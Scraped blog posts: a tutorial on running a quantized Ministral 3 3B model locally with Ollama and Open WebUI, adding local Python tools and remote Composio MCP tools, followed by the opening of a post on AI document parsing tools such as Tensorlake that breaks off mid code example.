&lt;p&gt;⚠️ &lt;strong&gt;CAUTION&lt;/strong&gt;: If you don't have sufficient VRAM (video memory) and decent specs on your system, your system might catch fire when running the model. 🫠&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If so, go with the quantized model instead, as I did.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b-instruct-2512-q4_K_M
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, start the Ollama server with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama serve
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once the model is downloaded and the server is running, you can quickly test it in the terminal itself.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama run ministral-3:3b-instruct-2512-q4_K_M &lt;span class="s2"&gt;"Which came first, the chicken or the egg?"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you get a response, you are good to go.&lt;/p&gt;
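&lt;p&gt;The &lt;code&gt;ollama serve&lt;/code&gt; process also exposes an HTTP API on port 11434, which is handy once you want to script against the model rather than chat in the terminal. Here's a minimal stdlib-only sketch using Ollama's standard &lt;code&gt;/api/generate&lt;/code&gt; endpoint (the model tag matches the quantized pull above):&lt;/p&gt;

```python
import json
import urllib.request

# Ollama's local HTTP API; the model tag matches the quantized pull above.
OLLAMA_URL = "http://localhost:11434/api/generate"
MODEL = "ministral-3:3b-instruct-2512-q4_K_M"

def build_payload(prompt: str) -> dict:
    # stream=False returns one complete JSON object instead of a
    # stream of partial chunks, which keeps the example simple.
    return {"model": MODEL, "prompt": prompt, "stream": False}

def generate(prompt: str) -> str:
    req = urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(build_payload(prompt)).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["response"]

# Example (requires `ollama serve` to be running):
# print(generate("Which came first, the chicken or the egg?"))
```

&lt;p&gt;This is the same API Open WebUI talks to in the next step, just called by hand.&lt;/p&gt;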

&lt;h3&gt;
  
  
  Step 3: Run Open WebUI
&lt;/h3&gt;

&lt;p&gt;To just talk with the model, the CLI chat with &lt;code&gt;ollama run&lt;/code&gt; works perfectly, but we need to add some custom tools to our model.&lt;/p&gt;

&lt;p&gt;For that, the easiest way is through Open WebUI.&lt;/p&gt;

&lt;p&gt;Download and run Open WebUI with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--network&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;host &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;OLLAMA_BASE_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http://127.0.0.1:11434 &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-v&lt;/span&gt; open-webui:/app/backend/data &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;--name&lt;/span&gt; open-webui &lt;span class="nt"&gt;--restart&lt;/span&gt; always &lt;span class="se"&gt;\&lt;/span&gt;
            ghcr.io/open-webui/open-webui:main
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That command starts &lt;strong&gt;Open WebUI&lt;/strong&gt; in Docker and sets it up to talk with the local Ollama server we just started with the &lt;code&gt;ollama serve&lt;/code&gt; command.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;docker run -d&lt;/code&gt; runs the container in the background (detached).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--network=host&lt;/code&gt; puts the container on the host network, so it can reach services on your machine using &lt;code&gt;127.0.0.1&lt;/code&gt; (localhost).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-e OLLAMA_BASE_URL=http://127.0.0.1:11434&lt;/code&gt; tells Open WebUI where your Ollama server is.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-v open-webui:/app/backend/data&lt;/code&gt; creates a persistent Docker volume so your Open WebUI chat history persists.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--name open-webui&lt;/code&gt; names the container.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--restart always&lt;/code&gt; makes it auto-start again after reboots or crashes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ghcr.io/open-webui/open-webui:main&lt;/code&gt; is the image being run (the &lt;code&gt;main&lt;/code&gt; tag).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To see if it all worked well, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker ps
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see a container with the name &lt;code&gt;open-webui&lt;/code&gt; and the status &lt;code&gt;Up&lt;/code&gt;, you are good to go, and you can now safely visit: &lt;code&gt;http://localhost:8080&lt;/code&gt; to view the WebUI.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Add Custom Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;Once you're in, you should see the new model &lt;code&gt;ministral-3:3b-instruct-2512&lt;/code&gt; in the list of models. Now, let's add our custom tools.&lt;/p&gt;

&lt;p&gt;First, let's test it with local tools: small Python functions that the model can call.&lt;/p&gt;

&lt;p&gt;Head over to the Workspace tab in the left sidebar, and in the Tools section, click on the "+ New Tool" button, and paste the following code: &lt;a href="https://gist.github.com/shricodev/422b04f2eac96c77a3210adaea1a1a9c" rel="noopener noreferrer"&gt;Local Tools&lt;/a&gt;&lt;/p&gt;
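&lt;p&gt;For context, Open WebUI expects a tool to be a Python class named &lt;code&gt;Tools&lt;/code&gt; whose type-hinted, docstring-documented methods are exposed to the model for function calling. A hypothetical minimal calculator tool (not the gist's code, just the shape) looks like this:&lt;/p&gt;

```python
class Tools:
    def add_two_numbers(self, a: int, b: int) -> int:
        """
        Add two numbers and return the sum.
        :param a: The first number.
        :param b: The second number.
        """
        # Open WebUI builds the function-calling schema shown to the
        # model from the type hints and this docstring.
        return a + b
```

&lt;p&gt;The clearer the docstring and parameter descriptions, the better a small 3B model does at picking the right tool.&lt;/p&gt;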

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" alt="Add tool in ollama webui"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, in a new chat, try saying something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"What's 6 + 7?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The model should use our added tool to answer the question.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" alt="Ministral 3 3B returning response after a tool call"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Add Remote MCP Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;But that's not fun. 😪 We want to use tools that are hosted remotely, right?&lt;/p&gt;

&lt;p&gt;For that, we can use Composio MCP, which is well-maintained and supports over 500 apps, so why not?&lt;/p&gt;

&lt;p&gt;Now we need the MCP URL... For that, head over to &lt;a href="https://docs.composio.dev/rest-api/tool-router/post-labs-tool-router-session?explorer=true" rel="noopener noreferrer"&gt;Composio API Reference&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Add your API key and the user ID, and make a request. You should get the MCP URL back in JSON format. Make a note of the URL.&lt;/p&gt;
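
&lt;p&gt;If you'd rather script this than click through the explorer, the same request can be built in Python. This is only a rough sketch: the endpoint URL below is a placeholder and the payload field is an assumption, so copy the exact endpoint and body from the API reference page above:&lt;/p&gt;

```python
import json
import urllib.request


def tool_router_request(url: str, api_key: str, user_id: str) -> urllib.request.Request:
    # Composio authenticates via the "x-api-key" header, the same header
    # we configure in Open WebUI later in this post
    body = json.dumps({"user_id": user_id}).encode()
    return urllib.request.Request(
        url,
        data=body,
        headers={"x-api-key": api_key, "Content-Type": "application/json"},
        method="POST",
    )


# The URL here is a stand-in: take the real endpoint from the API reference
req = tool_router_request(
    "https://example.invalid/session", "YOUR_COMPOSIO_API_KEY", "user-123"
)
```

&lt;p&gt;Sending the request with &lt;code&gt;urllib.request.urlopen(req)&lt;/code&gt; (or any HTTP client) should return the JSON containing the MCP URL.&lt;/p&gt;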

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" alt="Composio MCP URL"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 But is this the only way? &lt;strong&gt;No&lt;/strong&gt;, this is just a quick way I use to get the URL back without any coding. You can get it using &lt;a href="https://docs.composio.dev/tool-router/quickstart#using-tool-router-mcp" rel="noopener noreferrer"&gt;Python/TS code&lt;/a&gt; as well.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, you're almost there. All you need to do is add a new MCP server with this URL.&lt;/p&gt;

&lt;p&gt;Click on your profile icon at the top, under &lt;strong&gt;Admin Panel&lt;/strong&gt;, click on the &lt;strong&gt;Settings&lt;/strong&gt; tab, and under &lt;strong&gt;External Tools&lt;/strong&gt;, click on the "+" button to add external servers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" alt="Ollama webui new tool"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the dialog box, make sure that you switch to &lt;strong&gt;MCP Streamable HTTP&lt;/strong&gt; from &lt;strong&gt;OpenAPI&lt;/strong&gt;, and fill in the URL and give it a nice name and description.&lt;/p&gt;

&lt;p&gt;For Authentication, check &lt;strong&gt;None&lt;/strong&gt;; we will handle authentication with the additional header "x-api-key". In the Headers input, add the following JSON:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"x-api-key"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YOUR_COMPOSIO_API_KEY"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once that's done, click on &lt;strong&gt;Verify Connection&lt;/strong&gt;, and if everything went well, you should see "Connection Successful." That's pretty much all you need to do to use local and remote tools with the Ministral 3 3B model using Ollama.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" alt="Composio connection successful Ollama WebUI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The steps here are going to be pretty much the same for any other model that supports tool calling.&lt;/p&gt;

&lt;p&gt;Here's an example of the model returning a response after doing tool calls:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" alt="Ministral 3 3B tool call response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; The model might take quite some time to answer the question and perform tool calls, depending largely on your system's hardware.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If something is not working as expected, you can always check the logs of your Open WebUI container.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker logs &lt;span class="nt"&gt;-f&lt;/span&gt; open-webui
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" alt="Docker log for a container"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;p&gt;This entire demo used Ollama and Open WebUI. See if you can get it working with vLLM and Open WebUI; the steps are quite similar.&lt;/p&gt;

&lt;p&gt;Just follow the vLLM &lt;a href="https://docs.vllm.ai/en/latest/getting_started/installation/" rel="noopener noreferrer"&gt;installation guide&lt;/a&gt; for your system, which should get you going.&lt;/p&gt;

&lt;p&gt;Let me know if you are able to make it work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;That's it. We just ran a lightweight, quantized Ministral 3 3B model in Ollama, wrapped it with Open WebUI, and showed it can perform real tool calling, both with small local Python tools and remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;You now have a simple local setup where the model can do more than just chat. The best part is, the steps won't change for other models, and you can quickly have your own local model that's entirely yours.&lt;/p&gt;

&lt;p&gt;Now, try adding more toolkits and models (if your system can handle it) and just experiment. You already have a clear understanding of Ministral 3 3B and running models locally with Ollama. Apply it to your actual work, and you'll thank me later.&lt;/p&gt;

&lt;p&gt;Well, that's all for now! I will see you in the next one. 🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mcp</category>
      <category>productivity</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>✌️5 AI Document Parsing Tools That Actually Work 🚀🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Fri, 12 Dec 2025 12:35:04 +0000</pubDate>
      <link>https://forem.com/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</link>
      <guid>https://forem.com/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</guid>
      <description>&lt;p&gt;Working with real world documents is still pain. PDFs, invoices, random exports from legacy tools. Half the work is just getting them into a clean, structured format your models can use. 😕&lt;/p&gt;

&lt;p&gt;This post is about that first step, the one that usually gets ignored in demos and tutorials: parsing and structuring the documents.&lt;/p&gt;

&lt;p&gt;The tools here handle OCR, layout, tables, forms, and file formats so you can focus on the logic around them.&lt;/p&gt;

&lt;p&gt;I am walking through a few I actually like using, with short code snippets you can drop straight into your own projects.&lt;/p&gt;

&lt;p&gt;So, let's begin. 🚀&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" alt="Swag Man"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.tensorlake.ai/" rel="noopener noreferrer"&gt;1. Tensorlake&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Document Ingestion API plus a serverless runtime for agentic data workflows&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" alt="Tensorlake - Document Ingestion API plus a serverless runtime for agentic data workflows"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tensorlake gives you two big things in one place:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A Document Ingestion API that turns messy files into clean markdown or structured JSON&lt;/li&gt;
&lt;li&gt;A serverless platform to run agentic workflows on top of that data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can send PDFs, Office files, scans, images, or raw text and get back well-structured content with the layout preserved. In short, treat it as a Document Ingestion API, then add agent-style applications on top using their serverless runtime.&lt;/p&gt;

&lt;p&gt;So, instead of wiring up OCR, background jobs, and retry logic yourself, you get a single platform that parses, chunks, and classifies documents, then feeds the results into your agents or tools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;🤔 Is it for you?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you are building invoice extractors, contract analyzers, or any complex data ingestion or agents that need to actually read documents, Tensorlake sits right in the middle of your stack as the ingestion and workflow layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi format parsing:&lt;/strong&gt; Parse PDFs, Office docs, spreadsheets, presentations, images and raw text to markdown or JSON.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout aware output:&lt;/strong&gt; Preserves tables, sections and reading order so your RAG or search stays aligned with the original document, which many other tools miss.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" alt="Tensorlake preserving layout in the generated response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Schema based extraction:&lt;/strong&gt; Use JSON Schema or Pydantic models to pull out only the fields you care about.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agentic runtime:&lt;/strong&gt; Decorate Python functions, run them in sandboxes and let Tensorlake handle scaling, retries and state.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;
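
&lt;p&gt;As a small illustration of the schema-based extraction idea, a JSON Schema for pulling invoice fields might look like this (the field names are made up for the example; see Tensorlake's structured extraction docs for how to attach a schema to a parse call):&lt;/p&gt;

```python
# JSON Schema describing only the fields we want extracted from an invoice;
# everything else in the document is ignored by the extraction step
invoice_schema = {
    "type": "object",
    "properties": {
        "invoice_number": {"type": "string"},
        "vendor_name": {"type": "string"},
        "total_amount": {"type": "number"},
    },
    "required": ["invoice_number", "total_amount"],
}
```

&lt;p&gt;The same shape can equally be expressed as a Pydantic model if you prefer typed classes over raw dicts.&lt;/p&gt;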

&lt;blockquote&gt;
&lt;p&gt;Now, let's go through a quick code example of some common use cases.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Code Example: From PDF to markdown
&lt;/h3&gt;

&lt;p&gt;First, install the SDK and use the DocumentAI client to upload a PDF, start a parse job and stream the markdown chunks once parsing is done.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;tensorlake
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, to extract the text from a PDF, you can do something like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.documentai&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;

&lt;span class="n"&gt;doc_ai&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-api-key&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Upload and parse document
&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Start parsing
&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Wait until parsing is complete
&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;wait_for_completion&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SUCCESSFUL&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Each chunk is a piece of clean markdown
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;chunk&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chunks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chunk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the basic flow you would use in a backend job that takes uploaded PDFs and turns them into LLM friendly text for something like RAG or search.&lt;/p&gt;

&lt;p&gt;Once you have the chunks, you can push them straight into a vector store or a database.&lt;/p&gt;
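
&lt;p&gt;As a rough sketch of that handoff, you can map each chunk to a record with a stable ID before embedding and upserting. The record shape here is an assumption; adapt it to whatever your vector store expects:&lt;/p&gt;

```python
def chunks_to_records(chunks, doc_id):
    # Pair every chunk of markdown with a stable, per-document ID so that
    # re-parsing the same file overwrites records instead of duplicating them
    return [
        {"id": f"{doc_id}-{i}", "text": text}
        for i, text in enumerate(chunks)
    ]


# With the Tensorlake snippet above, the texts would be the chunk.content values
records = chunks_to_records(["# Invoice 42", "| item | qty |"], "invoice-42")
```

&lt;p&gt;From here, each record's &lt;code&gt;text&lt;/code&gt; gets embedded and upserted under its &lt;code&gt;id&lt;/code&gt;.&lt;/p&gt;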

&lt;p&gt;If you want more control over parsing, such as structured extraction, see: &lt;a href="https://github.com/tensorlakeai/tensorlake#structured-extraction" rel="noopener noreferrer"&gt;Structured Extraction&lt;/a&gt;. I'll leave that for you to explore.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Tiny agentic app on the Tensorlake runtime
&lt;/h3&gt;

&lt;p&gt;To run a small agentic app on top of Tensorlake, it's as simple as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;
